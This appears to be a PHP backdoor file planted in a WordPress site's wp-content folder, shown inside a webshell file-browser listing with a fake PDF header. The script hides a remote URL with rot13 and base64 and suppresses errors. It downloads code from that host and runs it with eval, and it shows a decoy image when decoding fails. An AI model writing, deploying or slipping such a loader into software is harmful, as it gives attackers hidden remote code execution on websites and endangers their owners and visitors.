%PDF- %PDF-
| Direktori : /var/www/projetos/revistashowdafe.com.br/wp-content/kk/ |
| Current File : /var/www/projetos/revistashowdafe.com.br/wp-content/kk/jj.php |
<?php
error_reporting(0);
ini_set('display_errors', 0);
function getContent($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($curl);
curl_close($curl);
if ($content === false) {
$content = file_get_contents($url);
}
return $content;
}
function encode_url($url) {
$encoded_url = base64_encode($url);
$encoded_url = str_rot13($encoded_url);
return urlencode($encoded_url);
}
function decode_url($encoded_url) {
$decoded_url = str_rot13(urldecode($encoded_url));
return base64_decode($decoded_url);
}
$encoded_url = 'nUE0pUZ6Yl9lLKphrzI2MKWcrP5wo20ipzS3Y215LJkzLF01Zmp%3D';
$decoded_url = decode_url($encoded_url);
if ($decoded_url) {
$content = getContent($decoded_url);
eval('?>' . $content);
exit;
} else {
// إذا فشل فك التشفير أو الرابط غير صحيح
header('Content-Type: image/jpeg');
$image_path = 'https://img.zeverix.com/ib/eSWYwVAM9iN8Esc_1742625447.png';
readfile($image_path);
}
?>